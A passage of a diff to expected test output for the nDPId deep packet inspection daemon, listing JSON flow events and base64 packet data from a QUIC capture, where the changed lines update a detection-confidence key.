MqH9w0rUvMze6gprpf\/7tktIfCTqw2Qj6+Gkt7WnBilpUaFfwjZrooYmfJ0DMITDqenN\/N95DqoILT6NKoG8ZEuXufJTYTBtIQQURklCzYwU+bVBfdZZKhXs38KMloqNck1yXZTWMqx0XcaKtPF38dzgU97G+ewHG\/d4QBFblkENQ59GekuwL0tajlQ1a5yv41R4OjF\/og3TAJBWTrUQFopI3FvTMPDLJkxnep4Xrtt3D9pwmCEDc5Asj6CgulJotykyE2uPE6yOnzV6YWwiNzS7S0bLajRUqyRCV2dgZXZaKJvRpr1CHOH"} -00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433283660,"flow_last_seen":1621433283660,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59622,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433096272,"flow_last_seen":1621433096272,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":62818,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
-00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621433005013,"flow_last_seen":1621433005304,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"168.78.153.39","src_port":35124,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00745{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433067725,"flow_last_seen":1621433067725,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"117.148.117.30","src_port":51075,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 
-00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433067996,"flow_last_seen":1621433067996,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"87.179.155.149","src_port":49689,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433283660,"flow_last_seen":1621433283660,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59622,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 
+00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433096272,"flow_last_seen":1621433096272,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":62818,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621433005013,"flow_last_seen":1621433005304,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"168.78.153.39","src_port":35124,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00745{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433067725,"flow_last_seen":1621433067725,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"117.148.117.30","src_port":51075,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433067996,"flow_last_seen":1621433067996,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433283660,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"87.179.155.149","src_port":49689,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433300632,"flow_last_seen":1621433300632,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433300632,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"108.171.138.182","src_port":50552,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1621433300632,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433300632,"pkt":"AAAAAAAAAAEASYHhCABFAAViwQFAAH4RVpKokEAFbKuKtsV4AbsFTpawy\/8AAB0IVc00l\/iOZRgANwACoQTdl\/GOABSj5yQ9HIigBgYJdQCUTNlANM6rqxfD5723bzbrUxaSqL+QgfFYDvSs2HF+3FZE\/TQjSbe4Km8KzftRRJ7WGWJLHVZGU6Pr8JJ9uxzBXyE3XW+2zfcSO0pInvNKKnyglyrBYAu3eLKCvMOF\/lcR22wWFyI78zQm\/U4997pUpU3IeDVTo+1apB0IH0pVnXk0s\/DcR6kAfTOaqckpKyJM+iypk884UqXCF7zKL7SZD4uGN8XS+r+vfGpyWarYF8YuRePoaTXkOZ60muMhm0jUocNqY\/U5XaGTP2BXnULnONu5tCViE2swJ5RpifKQhW0ajmcYyvMPByIkayNlHx+wVxBbD59Qy32KgOOXFf4bk8hLtiTkWyRCqp\/0xL9c3Vfn26VBZY5CoyUtdJBdTk8G94oF5RXnKlsW9RPQGN8PNrTlnxYqCMvKdLymzbrkSaVHd1s6hCDMlvKgPIqlyVPjyv7VwNwgypSmNGQjl2iP6PboGwtXnIpa5ka4IFOHhKblDAPYAGuoR3WhJLHbWPOhkpp2xAZBtIdfGz88WUhh\/fa+5OHfzxRvv\/+98pKocB5KIs+9XaMOM2b4ye775waBhKUHBxzU5chSbpQbjGNQ7UgHntGkQrLxRrgYK30BHeCwGqbB3O3zTGi28fjy0q+DQxv58s+isMuLf4rVml1bN6YCm+6tCQu1csCemJ3W1KsCnXf1iNt4C16k4KuAk4uDPh5S1ikxcI8fbKjrNcKeqP+jUu0A0AQxq4tHOgVeVJ99xXNa0rfYRr+KcbfwK2f3GdLGTda3yUnSVSryfyKJvL2Q+8aLblgUuM6hiD+LekvE\/L
lAnbBjLmD8wu4FP2UzL6qUbY58f\/mCvQGgHeRTMEUd4CowlgXPUdhQWeaDlfMLg9lfb0LA68XuyJmqrdq5bG2Bep8ngxyxEBYvezuPAC2Iz5rBy\/4kms+yRvo6kVIbiyCCpXtTDJRUyNmBT3rPW48C4LpJYm\/ICdZMpWdD0UGNtBqPhJE7WKkKOsCkPGnUmiGgDd0pjw+lR7ks28tZEyD2kzjPP7ttelpXI8vPVVoY4UZaApsgyum\/R33EOq89AHxrj6xsKtkVzUTlVCJby5kmDowFpY3WvjB3YKxK7u66vXI2uvpgNuceSN\/6K8VLUZARSSeqan2EPUjPwc8NG39Volpuo\/q6ci4X3xaY\/VIhhzOX0GkrQnDUt567z9VlzQJpCGMRaukTO8AYWCEgkfoe6nxM2l6atxd1xrKaWQ5J1s4Fb+l3ui1owS2vTplZ4RPYsayHMQAz9JTj3HW7PvghKUdzoLY3MmV80zisuPXVZXwU2r9a1f+c1uKlxlSpPR66onFKZZdWkDXHMs5slBPZ3cct6OQSpk1E+HaV0eC8NipyKySEkKnwHTUZdNtCvNWU+DfIdSY+5S7vDR\/kAFS+UkA+axllbFzhbZjbE98MSmiyGeojTXpwHvAETcKEIKQ42DITA7olKjQ58qBoakQBY2QIe2\/X\/a+1Rz3Qpmpf5f\/LIHyY8CJTH6Pguykmu8PZ2YjeCHh9nc4aZI\/D5huo5lq5GzxgnUbuvAghp+1jKsnjdIBsSbRH5Ax5Q1NaysWgoo4eoeRiE97DOBD3dFTT0U9rGH\/b9BWCRjOHVrT0xAYjOVJ9vKjsh\/uQE3RymgcpL9m+XSdoP7juYR415Wg2Oqxg61mfx+maFmAF5FUVl8xb42RdcnTELYsROvNQ5WWEs8jmQMghLxKlLWKQvG8aWjfEzyaOE4xFNVsM"} -00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433300632,"flow_last_seen":1621433300632,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433300632,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"108.171.138.182","src_port":50552,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 
-00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433110371,"flow_last_seen":1621433110371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433300632,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"125.136.204.4","src_port":56425,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433300632,"flow_last_seen":1621433300632,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433300632,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"108.171.138.182","src_port":50552,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 
+00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433110371,"flow_last_seen":1621433110371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433300632,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"125.136.204.4","src_port":56425,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433323690,"flow_last_seen":1621433323690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433323690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56844,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1621433323690,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433323690,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+3xAAH4RF4uokEAFcfqJ894MAbsFTp8Fzf8AAB0IvzqNQD0lRtMANwAyYa5fSLdWImB4ZVjTL2NEPya1cUtwCyStcfOGkb+i0HvP10Xnx2V6173CCBLyTlS2lW3ItThE\/V6vYeQp5d8+\/LNRUHhhok6SCvxveMOhomdOJpo8G34ZKxbpZZeGXMm+kxymEvh9PGGn4vHBB6v4SwzcoQL4QdYO+oYbe4NJGodI+SmHvMckm12krbWK18PtHzoYrJftqnunvJo9ULpSRaYu2+s6djIY3q7wuNnjJvZDUe5LF2t9pFC+gvIh2yTEiqiPxPThsUMHIGShrjOrLAxZrFkrJHPByKb8fTvaZlj+Dkpvl20jckd+I0vvUZV\/2XJXbyUBPGy2tkcDameP4Y5wVjdpq6TVih2KnVLphaiRQHJibXu58TyDz0Vd9X6glZg4tYEC2iKCYEy5kUqjvrjHuGphHab1PzL06uyyN+x\/732GK6ik4JUpWyZBztoY9G7fyAAxwg6UPj487al0tVnMwp1c37Z3vKYougGLf+uVEsTYDF7Cpqu+Ea7zDIydQx7IO8f0CUfPQi\/u8\/gD4HXXAdB2qA1yUY\/VlHUe3+mmQbrEIgq8uIdDQWKYbjVC5pvQNUhxoD\/aL0ONFl\/jOVpgaM\/zL2\/ko1dyUaMhLjojLbYyekvliZ3qkxk605uj5nYxD\/OY0t4miGDxZQMnUULowLp7cbjsKiCD\/BjS+2cK+geBlIFH1XYvpAgJYFqu5\/05GxQPEqo2AZuX650wvMXpjzo7oLSb3VQ3LP6jN+3GtZQkbqO0Ml2eFlFThBeHZyyNfdgISKQXW66VXUuuUPhduLb3p5Yeuex9h\/2xxRpZf+QwTlcaySd6XeQxuyDRaiHCM6HiKDMj8VSuGyQ6y6G\/CQ2lQpqTq0JCG\/TihEgoblpCMhxGu52dI8\/M4cE6+j2XEdE4krEK2jiEaIZKGdebeUzB9JAU0IEQ368+526\/BhOh0rEXo9RUgNgTnXonlH1MQUqO1fcoXxn08UG5E6ZYKgu\/OZN1pWGWjVSWyMfCT4BqFy0DQnEk0oVfz682lYFVubZ2QMzip7UVNkMKKCepikphE4c7ppd3hkLM9bsNAktobkOkAgW2i++QQX\/bTNfJxawx6s88fmfdgIdLdYyVTIeI78VHXkUVfbHcjoQFDDnKH\/5gdBE+P5BLF4EpLHfAF4Wx974YrGRnZHnoMF43ssv3SEdPlN2iriNrn4spM4xowNSQZcUmJHTcSpU+Uat4MDUM6V4RHks5OewDlWO4kOK+6LIYgpiR+yBKe\/LrPhXG4P4O0gNUot5Mb1kSEjLXUEj\/1PtJIrIb4oS70D8+c1NIiu\/OQVFn5lEPax5\/uGndd3bG0u6aRIwsYEkaTKTgdt2ZQun3oPeubolQM1fI1tzSovLzWnNl+koBh7dhxXhgQ\/X9UAn1n9hyc5f5taxal62r3tci4Mbbx8KPZBkYFj8Mmrqc8KDSHzLCloQSWCQSCkBQZ9FMu
VsXUYmlB3jRDOW7KZN2uY8kbzPbIbjPWcCvUdxdHVNDIlPdgQ\/XLcgXkYVqmy7m9JKpfEvarWH5dSTcvvBS\/j7hMNXbKyu2ZBJX6gfqjxLKsxKQggL6gi+eWunxMe\/1Z3CwjGLDysODiQjylrqRc\/i89KaJ4RMPmIB9Ni0qJzV1nr4XAGc8l7QrTQ6KvRGv+KgMs0SAAvvCG8jxH07B459x95jC8vicEuCu4Qa8+k5\/C+g6l70JY75v1dmSj7TKtkEeixX9hXhrRxZTs9Uf4IcI+X23icYMl1eKUVDfGr5SG09huGxWXyIx"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433323690,"flow_last_seen":1621433323690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433323690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56844,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433323690,"flow_last_seen":1621433323690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433323690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56844,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": 
{"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433390651,"flow_last_seen":1621433390651,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433390651,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":58414,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1621433390651,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433390651,"pkt":"AAAAAAAAAAEAU0VlCABFAAViM7pAAH4RJYuokEAFmWIcTuQuAbsFTrRvzv8AAB0INosFT237+MMANwBb9TwbasdQ32A5cX94fXk3R40z4mY0PhE1HEAJQYO4V6\/3tF0P2M88fsUndGz9Fr7kJKq5dvhE\/XERoYXV5NHZLSYf4DTWVhp7q1z6KYJRQxo75jUpfdEwUa6ZG+5bNu\/A5u9XKnFMFC0KCN5TT4NsPs0VPSqpEv80Khbgf8\/cxxTXZWjqluHOImCUv2NFZIJpo9CgaD0e+8GRtcXDohjn+znKXGpEH1V8b\/3kSK48z6I+6n3KVBV2xHgdOGQwwEd1q1J+ECF5KYSp9RUL0zzTscSavIziA0pSN7JIWZUep\/Ok1sLxp9ATB3LHSyV9ajz0afQRqz8lPxBfGq9y5R3BFba3C9vH70pf4yBTyQd6jqWvZyTR21R\/xl6xRf4gAhvJcYjJkxW+3lmGOhS68JXB7SBW\/j\/51vJYllmwAccGUXQGTXS5\/VWIw5VScjbKe0pa3A8a9e8Av\/ljOB\/HEfVTnsj+Y+qchpc8HO4XTQoFrPwaU8vXQ1JM66P7sQb1sco0zqaDzmitGZlUT1QWpnQr7eKksiSn9NnvNYTUvdDSSPn3PKsb2RhC9OqgtoYPKkGHpW8FvVwHYqbSyvaU3MJxUBlxuA0FvYBKTVbWO0AgmyZ
ocUfOLKTsk\/TZfqoCD3QW7FO7lNRUo+P1rP9gFOB463DdLyAUsjehCczhWZWdGU\/gT04HidAXsnw6jARYjLJBcLpd08Td0XXQY6albr3J8ZZ9LOvShd71AaKUK4b3zzE1WCv8qtmiARodSJhVf6dZMl+yNOLSPKMomawxSMzPdml\/FM\/zeE6Dlz+9BPCv+f08v5Fn9tMUAsDXRUKY+8WZNa7DgQzfNejuemuadnwoPLOzzh2w6xM0Rzp6OEuIpQFyQW5xNjLrzOOpMaJIzF2sqpzwfuKJCm3s1snEjO84ddDhgxqjSj4lavW+riy8zgmEWo47r2DqOd3WghFxjV8xyvlVX1uHWa05pzMGWfGeumcPVMyT0adU5+wJkEcRvHBRw+oHJsqaukZHSI5JJYAbZf1ESnjxhCqHtgklzs9ImmCW7GeF21uZglW+vjLUsQcwNpF8zy37gmZdX4j9TzC1fY1ZjbAZMCcZltyE4Ua\/HE9Gr4qIttYQRoSXvemLO35Ifzyp3YBJuix7D\/0G7UY96\/ygRaDjJYKdA8flhrjpLc01yADTlcnXVTVLb1A6zKUqy1IoG\/Tlk\/z3cQ9+IaG0ETvoH+URSO+Wy5\/31GgH86Fb91IlFWvBBgEg9o5mtJE4ZjuQeHoeCfnmV53e5D0s6e1mLoSTRslkgBkyPIHBkD+AfULG9yRcBDRHLVOUtHMauEJx5SFk6LDE48gvZ\/W14DPXuSshpkqThd+a9l965NCkiqLzobezcZyu8ONMCL4aWAP4JD6b0Xp08jXqOcZYqiJ7NZSbad15kseZHdYQvvA+PJhUbcE5YZWcn\/xOb806apm1GAxXDo9cx3POklhJ0tzP\/LMU\/8cl+t2ZxNjURhO8nGFdQRgkvW6BDfHMzQeR6PbeH3pEswauHhyM5fr7Wk49wwwktzukldwFbMPCg9p87hqBsGVxIND1WlwqOlV\/lxMTiW\/q4zZTP6jyb8htKoyq380p91mZyV0+Qdr+Qa7+\/NlUYv8PEee2yAJ5phlblYmFxIh\/JvKbTy5doeGxfVsMIJdICKa5u7\/SlsDHJCHaQdFlIVGoLAQ1H8FpK6Y\/P56TfHflnO\/ivZWYw6MQJh9riQHgPJbhr65Ah4Btxq8WeMahT6b7GzECoVCR8QqXUp3Q"} -00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433390651,"flow_last_seen":1621433390651,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433390651,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":58414,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; 
